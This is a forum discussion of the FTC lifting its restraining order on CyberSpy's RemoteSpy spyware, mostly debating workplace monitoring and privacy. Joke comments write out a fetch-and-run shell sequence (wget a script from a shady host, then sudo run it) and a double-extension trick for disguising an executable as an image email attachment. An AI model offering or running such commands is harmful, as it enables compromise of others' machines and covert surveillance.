Restraining Order On Commercial Spyware Lifted

Back in 2008, the US Federal Trade Commission filed a restraining order against CyberSpy Software, makers of a commercial spyware program that logged keystrokes, took screenshots, monitored IM conversations, and sent all the collected data back to the company's servers. Reader suraj.sun tips news that the order has now been lifted, allowing CyberSpy to sell its software, but with a few restrictions. "According to the US District Court settlement, the company must not provide users with the means to disguise the software as an innocent file or email attachment. Users must also be advised that doing so may violate US state or federal law. Additionally, all recorded information sent over the Internet must be encrypted and older legacy versions of the software must be removed from computers on which it was previously installed. ... RemoteSpy is said to employ rootkit techniques to hide from virus scanners."

Easy fix...

[gringer]

The final Order bars the defendants from providing purchasers with the means to disguise the product as an innocent file or e-mail attachment.

I'll do it for them:

1. rename 'malicious_software.exe' 'unicorns_with_flowers.jpg.exe'
2. attach to email

Re:Easy fix...

[selven]

No OS can possibly be secure against user security without giving the user no freedom (see: iPad).

Here's the similar exploit for Linux:

Linux newbie: How do I get $obscure_proprietary_hardware working on my system?
Evil black hat hacker: The following did it for me:

wget -O run.sh www.shady_website.ru/linux/puppies_and_unicorns/3a64bc92.txt
chmod +x run.sh
sudo ./run.sh

Linux newbie: Ok, thanks, I'll try that. I don't know what any of that means but it sure is nice to have people as advanced as you helping me!
Linux newbie: Sorry, I'm posting from my friend's computer here. My computer's broken from that. Any idea what it is?
Evil black hat hacker: Ok, we'll try SSHing into it and fixing everything remotely. Is your friend's computer also running Linux?
Linux newbie: Yes.
Evil black hat hacker: Ok, in order to SSH into your computer, first on your friend's machine run: wget -O run.sh www.shady_website.ru/lin...

Re:Easy fix...

[hairyfeet]

Or you could just go to this handy site that explains how to write a Linux virus in 5 easy steps (virus, trojan, worm, whatever, its a bug) and if you need a way to deploy it here is a PDF from researchers telling how they believe they can take over a repo without needing the private key. The simple fact is NOTHING is secure, short of using the "cut all the lines and bury it in a safe" method, which is why the military uses air gaps on important machines.

As for TFA, they'll probably have folks lined up to buy this crap. You don't know how many spouses want to spy on each other, it is just nuts! I actually had a state trooper come into my shop one time wanting me to have his wife's government email account to see if she was cheating. He actually thought him saying "I give you authorization" to hack a federal account would make it "okay". How sad that I had to explain to a state trooper that a state official can't give someone authorization to break into federal property.

Re:Easy fix...

[cappp]

To be fair the FTC required a fair bit more than the summary is stating.

...requires that the software provide notice that the program has been downloaded and obtain consent from computer owners before the software can be installed.
According to papers filed with the court, the defendants provided their clients with detailed instructions explaining how to disguise the spyware as an innocuous file, such as a photo, attached to an e-mail...
The final Order bars the defendants from providing purchasers with the means to disguise the product as an innocent file or e-mail attachment. It also requires that they inform purchasers that improper use of the software may violate state or federal law. The final Order also requires the defendants to take measures to reduce the risk that their spyware is misused, encrypt data transmitted over the Internet, police their affiliates to ensure they comply with the order, and remove legacy versions of the software from computers on which it was previously installed.

So Little

[Das+Auge]

Do the authorities care so little for the average citizen?

If they despise us so much, why don't they just allow phishing scams? Embezzlement? Ponzi scams?

Re:So Little

[couchslug]

"Do the authorities care so little for the average citizen?"

Yes. This will last a while, til things get rotten enough, then the purge-and-replace cycle begins again. It was ever thus, and so it shall be.

Re:So Little

[arth1]

Clearly, this is done "for the sake of" protecting children, "for the sake of" protecting us against terrorism, and "for the sake of" protecting our companies from industrial espionage.

When someone wearing a suit says "for the sake of", he or she means "in the name of".
Remember that the next time you vote.

Re:So Little

[Low+Ranked+Craig]

Well, yes, they do, but this is not an example of that. If I own a small company I can install whatever I want on my systems to monitor what my employees are doing for various reasons. I know of one specific case where a property management company does this to ensure that a disgruntled employee doesn't improperly handle a tenant's personal information - it is there for CYA reasons. I would also imagine that some parents would want to monitor their kids. I can see a lot of legitimate uses for this, and the ruling specifies that you cannot disguise the package as something else. I don't see or have a problem with this. Having said that, people will undoubtedly abuse the software, but that is true of most anything.

I don't think this is a good example of the authorities eroding the rights of the people - there are plenty of examples of that to be had.

Re:So Little

[digitalhermit]

This will last a while, til things get rotten enough, then the purge-and-replace cycle begins again.

If only it were so simple. It's relatively easy to pass a law. It's a lot more difficult to repeal them.

Re:So Little

[DaMattster]

"Do the authorities care so little for the average citizen?"

Yes. This will last a while, til things get rotten enough, then the purge-and-replace cycle begins again. It was ever thus, and so it shall be.

Of course, don't you know government and industry are mostly in sleeping together? Why do you think BP got away with murder up until the point thhings quite literally exploded.

Re:So Little

[Cryacin]

Remember that the next time you vote.

So am I voting for Pepsi, or Coke?!?

Re:So Little

[CrimsonAvenger]

If they despise us so much, why don't they just allow phishing scams? Embezzlement? Ponzi scams?

Since they run the largest Ponzi scheme in US History, I suspect that they're only down on them because they don't like competition.

Re:So Little

Do the authorities care so little for the average citizen?

Absolutely. The bureaucrats in Washington typically do little or nothing until the situation gets so bad that it threatens re-election opportunities; e.g., the 9-11, financial collapse, the BP environmental disaster. Once a situation reaches this level, they'll stand in front of every camera possible to declare something must be done in order to save face. Without this incentive, they're more than happy to sit on the lap of the corporate-backed lobbyists.

Of course, it doesn't say much about the American people that it takes a disaster of this level to get us motivated.

Re:So Little

[arth1]

So am I voting for Pepsi, or Coke?!?

Yes, that's about the freedom you have right now.

If you'd rather want the choice of lemonade, you have only a few choices, including expatriation and sedition. Attempts at changing the system from within is futile, and will only lead to Minute Maid(R)(TM) with 3% lemon juice.

Re:So Little

Nah- just have a 'death pool' site. You know, you get to bet on how certain people will die. Once the prize pools get high enough, I think you'll find some people placing some very specific bets, and winning them.

Re:So Little

[petermgreen]

If you increase the amount of money the value of each unit of money goes down. A system with unlimited money would mean each unit of money becomes worthless.

Hmmm ...

[WrongSizeGlass]

I wonder if the government lifted its restraining order on this software because they're using it, or a variation, themselves? Requiring encryption? Users can't disguise it, but what about government agencies? I may sound paranoid, but I don't care ... I'm going to buy a tinfoil hat for my computer!

Re:Hmmm ...

[AHuxley]

http://en.wikipedia.org/wiki/Magic_Lantern_(software)
Best to keep computer land flooded with low grade consumer OS and issues.
Just another warning, click and its gone.
What would the feds do if more users had Unix like backends with gui pop ups about changes to vital system areas?

Re:Hmmm ...

[Weezul]

No, just another evil corporation that isn't actually chopping up kittens and has powerful lobbyists. Yeah, amybe those lobbyists are partially police agencies, but surely the NSA/CIA don't need these guys.

Re:Hmmm ...

[DaMattster]

I wonder if the government lifted its restraining order on this software because they're using it, or a variation, themselves? Requiring encryption? Users can't disguise it, but what about government agencies? I may sound paranoid, but I don't care ... I'm going to buy a tinfoil hat for my computer!

Switch to the most secure operating system in the world, OpenBSD. No tinfoil needed.

Use in the workplace

[masmullin]

I am assuming that the order was recinded because workplaces might want this functionality. It sucks for workplaces to do this but it's their right to install this sw on the computers they own

Re:Use in the workplace

[Ornedan]

I see you are successfully ignoring the stealth aspect. Or maybe you think an employer has the right to spy on employees? (note spy vs monitor)

Re:Use in the workplace

[arth1]

I am assuming that the order was recinded because workplaces might want this functionality. It sucks for workplaces to do this but it's their right to install this sw on the computers they own

Is it also their right to install cameras in toilet stalls they own?
How about searching through cars in the parking lot they own?

It's easy to extend your logic to the point where the company owns you, and I don't think we want to approach those times again. (Personally, I'd like to see the point where the workers own the company, not the other way around.)

Re:Use in the workplace

[Alwin+Henseler]

Hardly. Of course as an employee it would be safer not to use workplace machines for private affairs at all... but:

It's perfectly reasonable a company should have control over how employees use the employer's equipment. But that should be limited to "work-time spent doing other things", "making sure company gear isn't used for illegal activity", "making sure company network isn't cluttered because company machines are (ab)used for P2P downloads", "blocking access to risky sites, or allowing access only to sites that won't cause malware infections", etc. etc. Summarized: operational issues.

That's something entirely different from "allowing employer to spy on everything an employee does". There's no reasonable grounds for that, period. If the law says otherwise than that law is wrong.

Re:Use in the workplace

[GillyGuthrie]

The name of the software company ("CyberSpy") sure seems to imply that its marketing strategy is to appeal to the obsessive stalker who needs a convenient way to spy on another person and steal their passwords, read their email, etc. I personally knew a guy that was so obsessed with his ex that he tricked her into d/l a similar spy program with very similar functionality to CyberSpy and all he did was change the filename of the install package to something a little less obvious (unicorns_with_flowers.jpg.exe was a good example).

I agree that the most legitimate use of this software would be for employers to monitor their employees. An employer who owns the computers its employees are using has a right to install spyware without employee's knowledge... duh. They are handing out paychecks and if they don't want their employees farting around on Facebook all afternoon, it's their right to "spy" and verify that rules are not being broken.

Re:Use in the workplace

I never understood that mentality. If you are representing the company in a n official capacity (using company email) and putting something in writing, why would you assume they won't find out? If they were monitoring your personal email (sent from home, not work) then I could understand the outrage, but WTF? It's the same thing with business phone calls at work. They should be monitoring them to make sure people aren't being rude, saying things that are wrong (legally and also for just simple mistakes).

Re:Use in the workplace

[drinkypoo]

Is it also their right to install cameras in toilet stalls they own?
How about searching through cars in the parking lot they own?

Are you really this stupid? The company already has a legal right to monitor your work activity, and already doesn't have a legal right to search your car or to watch you poop. Further, there is a clear difference between one and the other. The toilet is provided for your needs. The car is yours. The computer is provided for their needs, i.e. your work output.

It's reasonable not to want to work for someone who monitors your work activity, but not reasonable to compare that to monitoring your toilet activity.

Re:Use in the workplace

[Low+Ranked+Craig]

That's a bit of a red herring. For example, a company that handles personal customer info has a duty to ensure that that information is handled properly, and closely monitoring employee's handling of that data is completely legitimate as is making sure that the employee isn't spending all day playing Farmville. This is a very poor slippery slope argument - it is NOT easy to extend that logic to to video surveillance of a bathroom stall.

Re:Use in the workplace

[LordAndrewSama]

They have this sort of thing in Taiwan, I was working for a company in South Africa that bought the license to sell it. Here it is: Ip-Guard Basically, the software is scarily powerful in what it records and can do.

In south african law it's legal only if the employee is aware of it, so if it's in the employment contract. I think.

The company I was working for charged too much, didn't make enough sales, went tits-up. Classic case of greed before the fall.

Re:Use in the workplace

[DaMattster]

I see you are successfully ignoring the stealth aspect. Or maybe you think an employer has the right to spy on employees? (note spy vs monitor)

I guess it depends upon your purview and political orientation. An employer does have certain rights to protect its company image but only while implied employee is on company time. I've heard about stories about Coors employees being fired for drinking Bud while on their own time! This kind of spying is wrong!

Re:Use in the workplace

[DaMattster]

That's a bit of a red herring. For example, a company that handles personal customer info has a duty to ensure that that information is handled properly, and closely monitoring employee's handling of that data is completely legitimate as is making sure that the employee isn't spending all day playing Farmville. This is a very poor slippery slope argument - it is NOT easy to extend that logic to to video surveillance of a bathroom stall.

If you were monitored while taking your daily constitution, and it somehow got back to you, you would have a hell of law suit against your employer.

Re:Use in the workplace

[DaMattster]

It's easy to extend your logic to the point where the company owns you, and I don't think we want to approach those times again. (Personally, I'd like to see the point where the workers own the company, not the other way around.)

I think we never left those times. There are still FEW laws that protect the employee and MANY that protect the employer.

Re:Use in the workplace

[DaMattster]

I believe we do have a reasonable expectation of privacy. Kind of shame those that are greedy and in power forget what it is like when the shoe is on the other food.

Re:Use in the workplace

[andymadigan]

How about just firing them when they don't get their work done on time? Quite a bit easier than watching everything they do.

Re:Use in the workplace

[fuzzyfuzzyfungus]

As does its feature set. In your standard corporate/institutional environment, you don't need stealthy install techniques, since IT already has mechanisms in place for rolling out whatever software is needed; and you don't need any sophisticated AV-dodging techniques, since AV is typically centrally managed, and IT can whitelist whatever they want.

At best, this stuff is being used in interpersonally-touchy-but-legal ways(ugly roommate situations, spying on the kiddies, spousal paranoia, etc.), and I'm guessing that the sliminess of the customer base just increases from there.

Re:Use in the workplace

[Low+Ranked+Craig]

You'll need to explain that in more detail. If my employer tells me that they can and might monitor my system and I go to youporn.com on the company computer while on my "daily constitution" and I get canned, how exactly would I have a hell of a lawsuit against my employer?

Re:Use in the workplace

[WillDraven]

I hate to have to be the one to tell you this, but, "daily constitution" is a euphemism for a bowel movement. The GP wasn't talking about using the computers, he was talking about using the bathroom.

Re:Use in the workplace

[penix1]

I agree that the most legitimate use of this software would be for employers to monitor their employees. An employer who owns the computers its employees are using has a right to install spyware without employee's knowledge... duh. They are handing out paychecks and if they don't want their employees farting around on Facebook all afternoon, it's their right to "spy" and verify that rules are not being broken.

There are far more efficient ways than installing a rootkit on computers to "catch" employees. And no, I don't agree that an employer has the right to spy on employees without their consent as a condition of using the computer. If you are so worried that an employee is going to goof off, then maybe you don't have a clue how to manage your employees. In short, if an employee can maintain a satisfactory enough output that they retain their job, and have time to goof off, then you evidently don't have enough for them to do.

If you don't want your employees using facebook, then block access to facebook. Better yet, instead of blacklisting, employ whitelisting. Only allow work related sites through. That beats the spying.

Lastly, any organization that has that much distrust of their employees that they have to employ rootkits isn't a company I am willing to work for. Trust, like respect, is a two way street. If you don't trust me to do the job I was hired to do, then say so and I'll leave.

Re:Use in the workplace

[gringofrijolero]

The bathroom stall is the scene of much corporate espionage (you know, where you see the guy inserting or removing the capsule containing the microfilm, looking at it, then getting knocked on the head by a guy wearing the black ski mask), it is a legitimate surveillance target.. well, in Hollywood anyway

Re:Use in the workplace

[Runaway1956]

And, the legal situation is dynamic. Why do you think so many corporations are so happy to employ illegal aliens? It isn't just the up-front cost of employment. Millions of illegals also give the corporates the muscle to avoid increased wages, benefits, and rights of employees. If half of your employees are afraid to talk to a law enforcement officer for any reason, he certainly isn't going to rat on you for putting spycams in the restrooms! Any lesser violation of an employee's rights simply won't be noticed.

Re:Use in the workplace

[masmullin]

Because the gp is wrong. It's not about making sure the employees are using their time efficiently, it's about making sure that they aren't doing nefarious things like sharing trade secrets

Re:Use in the workplace

[GillyGuthrie]

I don't agree that an employer has the right to spy on employees without their consent as a condition of using the computer.

It IS their right... but you ARE allowed to disagree.

If you are so worried that an employee is going to goof off, then maybe you don't have a clue how to manage your employees.

I'M not a manager, I'm just a general-purpose technician. If a local business manager calls me and says he wants to limit Facebook access, I'm not going to advise him on his managerial skills. I am going to blacklist *.facebook.com on the local DNS server or use a DynDNS account with blacklisting/filtering and point the offender's NIC to that address. If he insists that he has made the decision that he wants spyware installed, guess what - I'll install it for him (assuming it's legal).

In short, if an employee can maintain a satisfactory enough output that they retain their job, and have time to goof off, then you evidently don't have enough for them to do.

I would absolutely hate to have a job where I have to maintain "satisfactory output" and have nothing to do, and out of boredom surf Facebook. I have a friend who feels this way, and spends literally hours a day sitting at his desk playing games on his Droid, making $40,000/yr. That actually pisses me off and I hope I don't ever degenerate into somebody who feels like I need a babysitter as a boss who spoonfeeds me work and checks in on me to make sure I'm busy.

Re:Use in the workplace

[TheLink]

Maybe he knew that already. In theory it's possible to use a computer while doing that. Just hope you don't inherit his "company issue laptop"...

Re:Use in the workplace

[arth1]

If by "really this stupid", you mean "think beyond the initial gut reaction", I sure hope so.

If the computer is only for company use, you have a case. If, however, the company allows the user any personal use of the computer, be it to read news during breaks, check personal e-mail, or listen to personal music, then it's not so clear-cut anymore. Then they do indeed provide computer resources "for your need" (your words) too, and monitoring that would logically be no different from monitoring other personal actions at the work place, be it your locker, the parking lot, or the rest rooms. It's then only a question of degrees, which is exactly why it's a slippery slope.

Re:Use in the workplace

[arth1]

as is making sure that the employee isn't spending all day playing Farmville

Why, exactly?
I can see that it's in the interest of the company to get as much work as at all possible out of an employee, but if one salaried employee works 8 hours and produces X amount of work, and the salaried employee in the next cubicle plays Farmville for 6 hours a day and STILL produces X amount of work, it's no loss. Both do their work. If a company wants them to work constantly, they should put them on wages, not salary. The whole reason behind salary is that you pay the employees to get the job done, not per ounce of sweat. It's not (as it's being used as now) a method to avoid having to pay overtime.

Of course, whether the user can access Farmville (or whatever) safely from a computer that has customer data is another matter. A VM for personal use that's on a different subnet would probably not be a bad idea.

Re:Use in the workplace

[Imrik]

You do not "need" to use a computer for personal reasons at work. As long as the company is up front about the monitoring software on the computer it is your option whether you want to use it for personal reasons.

Re:Use in the workplace

[arth1]

You do not "need" to use their parking lot or their rest room either. By the same logic, it's OK for a company to install monitoring devices and perform searches there too, as long as they are "up front" about it.

No, it's high time that employers are told what's permissible and what's not. Anything private should not be subject to searches, else we're already on that slippery slope.

Today, it's OK if they log your web access and go through e-mails stored on your computer.
Tomorrow, it's OK if they read through the remote e-mails you view on the screen, or your bank records if you view them through a browser at work.
Next week, it's OK if they scan USB keys and search through pockets of company uniforms.
Next month, it's OK if they scan cell phones and search through your lockers.
Next year, it's OK if they search through parked cars on their premises.
Next year, it's OK if they install cameras in the rec room (in the name of security!)
Two years from now, it's OK to install them in the bathrooms too (it says so on your contract; take it, or we'll hire someone of the 20% unemployed who's willing to sign).

You can't stop sliding here, unless you can clearly define what's permissible and what's not, in a way that cannot also be applied to other situations. Up until now, what's private is considered private even if it happens at a work place. Only law enforcement should be allowed to search what's private -- not company executives. I thought this was made pretty clear during Fiorinagate?

Re:Use in the workplace

[eyore15]

Is it also their right to install cameras in toilet stalls they own? How about searching through cars in the parking lot they own?

Are you really this stupid? The company already has a legal right to monitor your work activity, and already doesn't have a legal right to search your car or to watch you poop. Further, there is a clear difference between one and the other. The toilet is provided for your needs. The car is yours. The computer is provided for their needs, i.e. your work output.

It's reasonable not to want to work for someone who monitors your work activity, but not reasonable to compare that to monitoring your toilet activity.

I've been under the impression that monitoring your personal habits is part of the Japanese method management. Too many potty breaks and you get a stern talking to

duh

[KwKSilver]

Do the authorities care so little for the average citizen? If they despise us so much, why don't they just allow phishing scams? Embezzlement? Ponzi scams?

The authorities "care" for the average citizen is roughly 0.000. Who says the don't allow scams, embezzlement and Ponzi schemes. Isn't all that what blew up the economy a couple of years ago?

Re:duh

I think it is more because they don't like competition. Scams (Pork barrel projects) Ponzi (Social Security), Embezzlement (self voted raises).

Or on your own systems

[Sycraft-fu]

Not saying I'd trust software like this, but I could see the potential in wanting to be able to monitor your own computers. Maybe you live with roommates and you don't trust them to leave your shit alone, etc.

There are legit uses for having clandestine reporting software on a PC. Same deal as lock picks, firearms, and many other things with legal and illegal uses.

Sounds like the problem with these guys is they were attempting to primarily market it for illegal use. That is what gets you in trouble. If something has legal and illegal uses, but you market it for legal uses and attempt to sell it only to legal users, then you are fine. If you market it for illegal purposes, then you get in trouble.

That is why smoke shops are so big on what you say you are going to use their glassware for. It is perfectly legal to buy it for smoking tobacco. Bongs and such derive from Hookahs which were invented for the purpose of smoking tobacco. However, if you imply that you intend to use their products for smoking marijuana or other controlled substances, they'll refuse to sell to you. In this way they can make sure to stay clear legally. Though their products have illegal uses, they only market them for legal ones, and take care to attempt to not sell them for illegal purposes.

Re:Or on your own systems

That is why smoke shops are so big on what you say you are going to use their glassware for.

As someone who sold smoking accessories at one time, I can attest to this. We flat told people that these were for tobacco use only and that if they made any reference to illegal use, we would not sell to them. Ironic, but about 3% of the people were too stupid (or stoned) to understand this, thus they didn't get to buy. Otherwise, I would have been guilty of selling "drug paraphernalia" and subject to a fine or losing my business license.

Then again, laws against marijuana are stupid to begin with, and half the cops I know would like them repealed. The only group that I am aware of that unanimously wants to keep marijuana illegal is the drug dealers, who profit greatly by selling a weed that will grow almost anywhere.

Re:Or on your own systems

[DigiShaman]

The only problem I have with marijuana is with regards to driver and work safety. It has an adverse effect on reaction time. Agencies such as NHTSA and OSHA would agree I'm sure.

On the whole, marijuana's impact on the body is far less damaging (if at all) compared to alcohol. However, THC (active substance in marijuana) takes longer to metabolize than alcohol does. If you smoke habitually, it starts to effect serotonin levels until the user stops. It's now even more serious with newer breeds of plants. THC level increases between 15% and 25% are not uncommon. Once it become industrialized with genetic engineering, I can only imagine how much more potent they can get. While federal regulation can play a major role here, metabolization within a 12 to 24 hour period would be a major issue with regards to cognitive impairment.

Re:Or on your own systems

[Garrett+Fox]

How can we plausibly restrict the sale of malware if the seller can point to the smoke shops for comparison? Seems like they only have to wink and say "don't tell us you plan to do anything illegal with it".

Re:Or on your own systems

[DigiShaman]

Have you ever been stoned? Do you even know why it's called "stoned"? Depending on how stoned you are, the feeling is like you head being in one location while the body is half way around the world connected via a very long spinal cord. We're talking about a major millisecond (to full second) delay in reaction time.

You do not want to be operating a band-saw while stoned. Unless you don't mind losing a few fingers in the process!

Re:The FTC has failed.

I believe it would vary depending on ownership of the machine, etc. For example, in the US it is probably legal for a corporation to monitor keystrokes it's employees make on the computers the company owns. (It probably is not legal to do so in the EU, but this was a US case). It may also depend on what prior information about logging was disseminated to employees. For example, at my work, we have a "logon banner" which comes up before logon that you have to "OK" in order to logon that contains text saying that you may be subject to monitoring. That probably makes it legal.

Re:The FTC has failed.

Companies use this type of software on employee computers owned by the company. The end user consents either in their employment contract or a terms of use contract they sign before they use the computer.

Re:The FTC has failed.

[AHuxley]

You installed it on your own property for back up use :)

What if you own half of the computer?

[QuincyDurant]

It's their right to install this sw on the computers they own.

California is a community property state. This means your wife owns half of your computer. Uh, oh. And even if you live in a spare bedroom at your mom's house, single and bad husband material at age 32, you may not want this software to email mom a jpeg of the download page from www.toilet-rated-pron.com She bought it for you, remember?

Re:What if you own half of the computer?

[NNKK]

Absent specific laws or agreements to the contrary, each owner in a jointly-owned property has the right to do anything they want with said property, with or without the consent of the other owner(s).

Visible spyware?

[assemblerex]

How do you market an oxymoron?

Re:Visible spyware?

[lostsoulz]

How do you market an oxymoron?

Why...ask Bill Gates! I know, it's a cheap shot - 's/Bill Gates/Steve Jobs/g' if you wish.

Re:Visible spyware? - does it run on linux ;)

[Janek+Kozicki]

Dear CyberSpy software

I need to spy my sysadmin, because he is suspected of spying on company's emails. That is why I am sending this email from my hotmail account instead of company's server. I want to purchase your RemoteSpy software.

PS: you asked about his windows version. I just checked that, he is running windows version called "Slackware" I hope this helps.

PSS: I have already paid on your secure website using my credit card,
best regards

Re:The FTC has failed.

[jonbryce]

I think Cyberspy is arguing that their software is intended to be installed with the consent of the owner of the computer. For example parents monitoring their childrens' computer useage, and employers monitoring their employees.

Re:Visible spyware? - does it run on linux ;)

[DaMattster]

Yes, it does run on Linux.

No need to fear...

[pongo000]

...as I imagine it will only be a matter of time before some inquisitive folks who are up to the challenge figure out how to detect (and possibly disable) this.

Re:Ownership has nothing to do with it

[masmullin]

WTF are you talking about? Of course it's about whether the employer owns the hardware. You can't install stuff on employees private property.

For the record using this software is pretty lame. If an employer wants to monitor employees just tell the employees they are being monitored and use a less obfuscated software system. However, if the employer owns the hardware they can do whatever the fuck they want with it.

Re:Ownership has nothing to do with it

[Imrik]

You can however require that the software be installed on any computer that uses the company network or even on any computer that's in the building.

I turned down the "opportunity" ...

[Brett+Johnson]

Back in 2002 or 2003 I was offered a job with these guys [or possibly a similar firm] to port the software to Mac OS X. Once I was informed that the product I would be working on was to be used to spy on a company's employees, I chose to decline. When I started in my career almost 30 years ago, I vowed to myself that I would pursue it with the utmost integrity. This was way over *my* line.

Re:Ownership has nothing to do with it

[masmullin]

So don't use private computers at work. Don't connect to the work VPN with private computers. You shouldn't be doing these things anyway.

Employers cannot demand you to utilize private equipment for work tasks.

This from the Democrats?

[chasisaac]

Let me see if understand this correctly:

Bush's FTC stopped this horrid piece of software from infecting a persons machine.

Obama's FTC allows allows this spyware into the world.

Can someone remind which party is for 'the little guy'.

Wow am I glad we voted Obama in.

Tinfoil hat? Don't do it!

[Benfea]

Tinfoil hats actually amplify government mind control rays! Putting on tinfoil hats is exactly what they want you to do! ;)